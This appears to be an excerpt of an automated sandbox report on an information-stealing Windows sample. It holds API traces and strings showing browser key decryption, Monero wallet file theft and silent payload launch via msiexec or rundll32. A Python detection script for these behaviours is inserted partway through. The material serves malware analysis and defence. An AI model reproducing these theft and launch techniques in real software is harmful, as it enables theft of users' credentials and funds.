                                        • Part of subcall function 0230CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0230CAD8
                                        • Part of subcall function 0230CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0230CAE3
                                        • Part of subcall function 0230CA87: memcpy.MSVCRT(?,?,?), ref: 0230CB79
                                      • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0230CFC1
                                      • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0230CFD8
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B46), ref: 0230CBAA
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B47), ref: 0230CBBE
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0230CBDF
                                      • lstrlen.KERNEL32(00000000), ref: 0230D0AB
                                      • CloseHandle.KERNEL32(00000000), ref: 0230D103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction ID: d14493c5e60cf361fa612e29ad9d3fe0d31451eca43255aa51e6a7165a644351
                                      • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction Fuzzy Hash: ACE1F076901248AFCB29EBE4DD94FEEB77AAF14301F004159F106A7190EF346A89CF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,0087EC00,00000000,00020019,00000000,004205B6), ref: 004183A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                      • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                      • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                      • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memset.MSVCRT ref: 00410C1C
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                      • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                      • lstrlenA.KERNEL32(?), ref: 00410CA7
                                      • memset.MSVCRT ref: 00410CCD
                                      • memset.MSVCRT ref: 00410CE1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID: .exe
                                      • API String ID: 1395395982-4119554291
                                      • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                      • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                      • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                      • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                      • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                      • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                      • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                      APIs
                                      • strtok_s.MSVCRT ref: 00411307
                                      • strtok_s.MSVCRT ref: 00411750
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                      • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                      • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                      • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                      • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                      • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                      • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                      APIs
                                      • memset.MSVCRT ref: 0041429E
                                      • memset.MSVCRT ref: 004142B5
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                      • lstrcatA.KERNEL32(?,008807A0), ref: 0041430B
                                      • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                      • lstrcatA.KERNEL32(?,00880E18), ref: 00414333
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                      • StrStrA.SHLWAPI(?,00881EB8), ref: 004143F3
                                      • GlobalFree.KERNEL32(?), ref: 00414512
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                      • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                      • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                      • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                      • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                      • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                      APIs
                                      • memset.MSVCRT ref: 02314505
                                      • memset.MSVCRT ref: 0231451C
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02314553
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 02314572
                                      • lstrcat.KERNEL32(?,?), ref: 02314586
                                      • lstrcat.KERNEL32(?,0064A5D8), ref: 0231459A
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02318FF7: GetFileAttributesA.KERNEL32(00000000,?,02301DBB,?,?,00425654,?,?,00420E1F), ref: 02319006
                                        • Part of subcall function 02309F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02309FA0
                                        • Part of subcall function 02309F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02309FF9
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                        • Part of subcall function 02319627: GlobalAlloc.KERNEL32(00000000,02314644,02314644), ref: 0231963A
                                      • StrStrA.SHLWAPI(?,0064A0D8), ref: 0231465A
                                      • GlobalFree.KERNEL32(?), ref: 02314779
                                        • Part of subcall function 02309D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D56
                                        • Part of subcall function 02309D27: LocalAlloc.KERNEL32(00000040,?,?,?,02305155,00000000,?), ref: 02309D68
                                        • Part of subcall function 02309D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D91
                                        • Part of subcall function 02309D27: LocalFree.KERNEL32(?,?,?,?,02305155,00000000,?), ref: 02309DA6
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231470A
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 02314727
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02314739
                                      • lstrcat.KERNEL32(00000000,?), ref: 0231474C
                                      • lstrcat.KERNEL32(00000000,00420FB8), ref: 0231475B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction ID: 2dd1413e4efc10df217f51261e1c5a6ba22c4d96e5a4398f225d3d3edbe0ca8b
                                      • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction Fuzzy Hash: BB7164B6900218BBDB28FBE0DC99FEE737AAF48700F008598E60596180EB35D745CF61
                                      APIs
                                      • memset.MSVCRT ref: 00401327
                                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                      • lstrlenA.KERNEL32(?), ref: 0040135C
                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                      • memset.MSVCRT ref: 00401516
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 1930502592-218353709
                                      • Opcode ID: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                      • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                                      • Opcode Fuzzy Hash: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                      • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
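Two records above give a defender concrete things to key on: the ShellExecuteEx routine whose strings build `C:\Windows\system32\msiexec.exe /i "<file>.msi" /passive` or `C:\Windows\system32\rundll32.exe <file>.dll`, and the routine just above that reads the registry value `wallet_path` under `SOFTWARE\monero-project\monero-core`, appends `.keys` (falling back to `\Monero\wallet.keys`), copies the file with CopyFileA, reads it and deletes the copy. The Python below is an added example, not part of the report: it runs a few rules over constructed, loosely Sysmon-shaped events. The event schema, the user-writable-path heuristic, the list of legitimate Monero binaries and the HKCU hive (the report shows the hive argument only as 000000FF) are assumptions; adapt the field names to your telemetry.

```python
"""Detection rules for the payload-launch and Monero wallet-theft behaviours
recorded above. Added example; events below are constructed."""
from __future__ import annotations

import re
from typing import Iterable

# Paths an unprivileged user can write to; tune for your environment.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Temp|Windows\\Temp)\\",
    re.IGNORECASE,
)
# Processes expected to read Monero wallet files (assumed list).
MONERO_IMAGES = {"monero-wallet-gui.exe", "monero-wallet-cli.exe", "monero-wallet-rpc.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> str | None:
    image = _basename(ev["image"])
    cmd, low = ev["cmdline"], ev["cmdline"].lower()
    # msiexec /i "<path>.msi" /passive: exactly the command line the sample
    # builds; /passive shows only a progress bar, so the victim sees no prompt.
    if image == "msiexec.exe" and "/i" in low and "/passive" in low:
        m = re.search(r'"([^"]+\.msi)"|(\S+\.msi)\b', cmd, re.IGNORECASE)
        if m and USER_WRITABLE.search(m.group(1) or m.group(2)):
            return "msiexec_passive_user_path"
    # rundll32 <path>.dll[,export] where the DLL sits in a user-writable dir.
    if image == "rundll32.exe":
        m = re.search(r'"([^"]+\.dll)"|(\S+\.dll)\b', cmd, re.IGNORECASE)
        if m and USER_WRITABLE.search(m.group(1) or m.group(2)):
            return "rundll32_user_path_dll"
    return None


def check_registry(ev: dict) -> str | None:
    # The sample reads wallet_path to learn where the .keys file lives.
    if ev["key"].lower().endswith("software\\monero-project\\monero-core") \
            and ev["value"].lower() == "wallet_path" \
            and _basename(ev["process"]) not in MONERO_IMAGES:
        return "monero_wallet_path_read"
    return None


def check_file(ev: dict) -> str | None:
    # <wallet_path>.keys or \Monero\wallet.keys opened by something that is
    # not a Monero binary. ".keys" alone is broad; narrow it if it is noisy.
    if ev["path"].lower().endswith(".keys") and _basename(ev["process"]) not in MONERO_IMAGES:
        return "monero_wallet_keys_access"
    return None


def evaluate(events: Iterable[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every event that matches a rule."""
    checks = {"process": check_process, "registry": check_registry, "file": check_file}
    hits = []
    for i, ev in enumerate(events):
        rule = checks[ev["type"]](ev)
        if rule:
            hits.append((i, rule))
    return hits


# Constructed events: 0, 2, 3 and 5 mimic the sample; 1 and 4 are benign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\pkg.msi" /passive',
     "parent": r"C:\Users\bob\Downloads\is65NMeWkV.exe"},
    {"type": "process", "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /passive',
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "process", "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Users\bob\AppData\Local\Temp\stage2.dll,Start",
     "parent": r"C:\Users\bob\Downloads\is65NMeWkV.exe"},
    {"type": "registry", "process": r"C:\Users\bob\Downloads\is65NMeWkV.exe",
     "key": r"HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core", "value": "wallet_path"},
    {"type": "file", "process": r"C:\Program Files\Monero GUI Wallet\monero-wallet-gui.exe",
     "path": r"C:\Users\bob\Documents\Monero\wallets\main\main.keys"},
    {"type": "file", "process": r"C:\Users\bob\Downloads\is65NMeWkV.exe",
     "path": r"C:\Users\bob\Documents\Monero\wallets\main\main.keys"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The process rules fire on the command line alone; in real telemetry also require that the parent is not an installer or explorer, which the constructed events carry in `parent` but the rules leave to the reader's tuning.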
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
